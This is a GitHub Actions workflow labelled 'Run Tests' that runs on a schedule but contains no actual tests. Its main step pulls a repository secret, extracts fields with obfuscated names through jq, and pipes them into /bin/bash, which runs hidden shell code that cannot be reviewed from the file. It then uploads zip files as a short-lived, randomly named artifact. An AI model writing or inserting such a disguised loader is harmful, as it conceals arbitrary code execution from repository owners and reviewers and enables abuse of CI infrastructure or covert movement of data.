name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '57 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          qa0145: ${{ secrets.qa0145 }}
        run: |
          printf '%s' "$qa0145" | jq -r .yoz0692 | /bin/bash
          printf '%s' "$t362" | jq -r .yeo1324 | /bin/bash
          printf '%s' "$vpw56" | jq -r .leoyc81478 | /bin/bash
          echo $qmsao1 | jq -r .in51158 | /bin/bash
          echo $hp60154 | jq -r .chjh2044 | /bin/bash
          printf '%s' "$u0" | jq -r .tkfb244 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 9MGFyLxV
          path: "*.zip"
          retention-days: 1
